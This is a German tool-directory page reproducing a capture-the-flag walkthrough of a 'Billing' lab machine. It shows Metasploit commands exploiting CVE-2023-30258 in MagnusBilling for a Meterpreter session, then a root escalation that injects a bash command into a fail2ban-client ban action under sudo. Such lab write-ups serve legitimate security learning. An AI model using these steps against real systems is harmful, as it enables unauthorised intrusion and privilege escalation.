Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Room-Walkthrough-Billing — Eine detaillierte Anleitung zum Ausnutzen von CVE-2023-30258 im Billing room und zur Eskalation über eine Fehlkonfiguration von fail2ban | Kitploit
Tools/GitHubGitHub/adityabhatt3010/room-walkthrough-billing
Privilege EscalationAufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubadityabhatt3010/room-walkthrough-billing

Room-Walkthrough-Billing

Eine detaillierte Anleitung zum Ausnutzen von CVE-2023-30258 im Billing room und zur Eskalation über eine Fehlkonfiguration von fail2ban

Repository anzeigen
141vor 1 MonatNoch nicht geprüft

🧠 Raum-Walkthrough: Billing

Verfasst von: Aditya Bhatt | Open Source Contributor


📦 Überblick

In diesem Walkthrough stürzen wir uns voll und ganz auf den Billing-Raum, der eine anfällige MagnusBilling-Instanz, eine saftige unauth RCE (CVE-2023-30258) und eine fail2ban-sudo-Fehlkonfiguration zeigt, die förmlich „Root mich“ schreit.

Dieser Raum verbindet gekonnt automatisierte Ausnutzung mit kreativer Privilegieneskalation und gibt uns einen praktischen Einblick in reale Schwachstellen, die in VoIP-Abrechnungssoftware lauern. Wir gehen von Initialer Aufklärung bis zur Root-Shell mit vollständigem PoC, Kommentaren und 🗿-Vibes.


🌐 Schritt 1: Aufklärungsphase

🏁 Erster Eindruck

Nach dem Bereitstellen der Maschine fällt dir sofort wie eine falsch konfigurierte Firewall ins Auge:

root@kitploit:~
http://<Maschinen_IP>/mbilling/

Das ist die MagnusBilling-Anmeldeseite. Das allein lässt die Alarmglocken schrillen – du weißt, dass dich ein saftiges CVE-Spiel erwartet.

Site


🔍 Nmap-Tiefenaufklärung + Gobuster

Wir beginnen mit dem ultimativen Aufklärungs-Duo:

root@kitploit:~
nmap -A -sV -p- 10.10.115.173

🧠 Ergebnisse:

  • Port 5038 – Asterisk Call Manager/2.10.6
  • Weitere HTTP-Dienste sind unter /mbilling/ verfügbar

Als nächstes gehen wir mit Gobuster auf Volllast-Brute-Force:

root@kitploit:~
gobuster dir -u http://10.10.115.173/mbilling -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt
gobuster dir -u http://10.10.115.173/ -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt

🧠 Ergebnisse:

  • robots.txt

Robots

🏗️ robots.txt

Dann prüfen wir die robots.txt der Seite auf etwaige Leckereien:

root@kitploit:~
User-agent: *
Disallow: /mbilling/

Hmm … der Versuch, es zu verstecken, macht es nur noch begehrenswerter 😈

Robots


🔌 Schritt 2: Exploitation

🔥 Port 5038 – Asterisk Manager

Ein schneller Netcat-Test bestätigt, dass er antwortet mit:

root@kitploit:~
Response: Error
Message: Missing action in request

Das bestätigt weiter: Das Backend ist MagnusBilling, und der Port ist mit Asterisk Call Manager verbunden. Zeit, unsere dunklen Künste zu beschwören 🧙

5038


⚔️ Waffe der Wahl: CVE-2023-30258

Exploit: Unauthenticated Remote Code Execution in MagnusBilling Modul: exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

Metasploit starten:

root@kitploit:~
msfconsole
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

msf_1

Dann die Anforderungen prüfen:

root@kitploit:~
show options

msf_2

Dann Folgendes setzen:

root@kitploit:~
set RHOSTS 10.10.115.173
set LHOST 10.17.88.138
run

msf_3
msf_4

Ein paar Sekunden später … Boom. Wir haben eine Meterpreter-Sitzung!

root@kitploit:~
shell
whoami ➤ asterisk
uname -a ➤ Linux Debian 6.1 x86_64

Versuchte eine TTY-Shell zu spawnen:

root@kitploit:~
python3 -c 'import pty; pty.spawn("/bin/bash")'

msf_5_1


🧭 Schritt 3: Benutzeraufklärung

Wir beginnen uns nach oben zu bewegen mit:

root@kitploit:~
cd ..
cd ..

msf_5_2

Bis wir finden:

root@kitploit:~
cd /home/magnus
cat user.txt

msf_6

Schön! Aber wir sind noch nicht fertig. Wir brauchen root, und Magnus flüstert uns Geheimnisse zu.


🧨 Schritt 4: Privilegieneskalation

Prüfen wir, was wir mit sudo ausführen können:

root@kitploit:~
sudo -l

Ergebnis:

root@kitploit:~
(ALL) NOPASSWD: /usr/bin/fail2ban-client

Das ist 🔥. Wir können fail2ban-client missbrauchen, um mit root-Rechten mittels Bann-Aktionen Befehle auszuführen.


🎯 Fail2Ban-Missbrauch → Root-Shell

Lass uns fail2ban neu starten:

root@kitploit:~
sudo /usr/bin/fail2ban-client restart

Dann injizieren wir den Befehl, um die Root-Flag zu stehlen:

root@kitploit:~
sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'cat /root/root.txt > /tmp/root.txt && chmod 777 /tmp/root.txt'"

Den Bann (und damit den Befehl) auslösen:

root@kitploit:~
sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1

Dann:

root@kitploit:~
cat /tmp/root.txt

msf_7

Gerootet. Wie. Ein. Boss. 🗿🔥


✅ Abschließende Zusammenfassungstabelle


🧠 Was du gelernt hast (a.k.a. Semi-Pro-Weisheit)

  1. 🔍 Aufklärung ist mehr als nur Scannen – Suche nach versteckten Seiten, prüfe robots.txt und grabe in seltsamen Ports.
  2. 💣 Bekannte CVEs ausnutzen – MagnusBilling war anfällig für einen öffentlichen Exploit (CVE-2023-30258).
  3. 🔓 Privilegieneskalation bedeutet nicht immer Kernel-Exploits – Falsch konfigurierte sudo-Rechte (wie bei fail2ban-client) sind genauso gefährlich.
  4. ⚙️ Kreativität zählt – Benutzereinschränkungen mit Bann-Aktionen zu umgehen, zeigt reales laterales Denken.

🗿 Letzte Worte

Diese Box war eine wunderbare Balance aus automatisierter Ausnutzung und manueller Post-Exploitation-Kreativität. Von MagnusBilling-RCE bis zum fail2ban-Rooten trifft sie alle richtigen Töne für die Playlist eines Pentesters 🎧🎯

Egal, ob du ein Anfänger bist, der sich verbessern möchte, oder ein erfahrener Krieger, der Flags sammelt – dieser ist ein Must-Pwn.

Bis zum nächsten Mal, Bleib gefährlich. Bleib neugierig. Bleib majestätisch. 🗿

Tool herunterladen
🔎 Phase💥 Aktion/Genutztes Tool
Erster Zugriff/mbilling-Portal und Port 5038 via Nmap + Gobuster entdeckt
AufklärungsfundMagnusBilling CMS + Asterisk Call Manager
ExploitationCVE-2023-30258 via Metasploit → Meterpreter-Shell
Aufklärung/home/magnus/user.txt gefunden
Privilegieneskalationfail2ban-client-sudo NOPASSWD ausgenutzt → RCE als root
Root-Flag/root/root.txt via fail2ban-Payload-Injektion abgerufen